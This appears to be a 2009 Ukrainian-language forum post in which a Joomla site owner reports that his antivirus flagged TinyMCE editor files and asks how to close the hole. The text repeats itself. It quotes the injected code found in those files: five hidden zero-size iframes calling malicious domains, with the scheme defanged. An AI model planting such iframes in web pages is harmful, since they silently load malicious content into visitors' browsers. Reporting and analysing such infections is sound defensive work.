09.01.2009, 06:08 PM
Почалося з того, що NOD32 заблокував попап вікно в редакторі tyniMCE при редагуванні лінків та якорів.
Виявилося, що в файлах
/pluginseditorstinymcejscriptstiny_mcethemesadvancedanchor.htm
/pluginseditorstinymcejscriptstiny_mcethemesadvancedlink.htm
знайшов ось таке
Отут прочитав [url=]http://benmay.org/web-design-info/joomla-iframe-injection-hack[/url=] що це хак і заражено багато файлів.
Наслідки:
- сторінки блокуються антивіром (і не тільки поп-апи), тобто деякий денай оф сервіс
- тормозить при формуванні сторінок
- реалізована заготовка для закачування вредоносного коду
Хто знає де в джумлі проблема і як цю дірку заліпити ?
P.S. сайт у грудні було оновлено до останньої версії 1.5.8, але цей апдейт не заміщує файлів що заражено.
Виявилося, що в файлах
/pluginseditorstinymcejscriptstiny_mcethemesadvancedanchor.htm
/pluginseditorstinymcejscriptstiny_mcethemesadvancedlink.htm
знайшов ось таке
Цитата:...тільки іфрейми однією стрічкою (що характерно, якщо не однією стрічкою - антивірус не бере), і звісно ж хттп як http.
</html>
<iframe src="хттп://yahoo-analytics.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="хттп://pinoc.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="хттп://google-analyze.org/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="хттп://wsxhost.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
<iframe src="хттп://msn-analytics.net/count.php?o=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no></iframe>
Отут прочитав [url=]http://benmay.org/web-design-info/joomla-iframe-injection-hack[/url=] що це хак і заражено багато файлів.
Наслідки:
- сторінки блокуються антивіром (і не тільки поп-апи), тобто деякий денай оф сервіс
- тормозить при формуванні сторінок
- реалізована заготовка для закачування вредоносного коду
Хто знає де в джумлі проблема і як цю дірку заліпити ?
P.S. сайт у грудні було оновлено до останньої версії 1.5.8, але цей апдейт не заміщує файлів що заражено.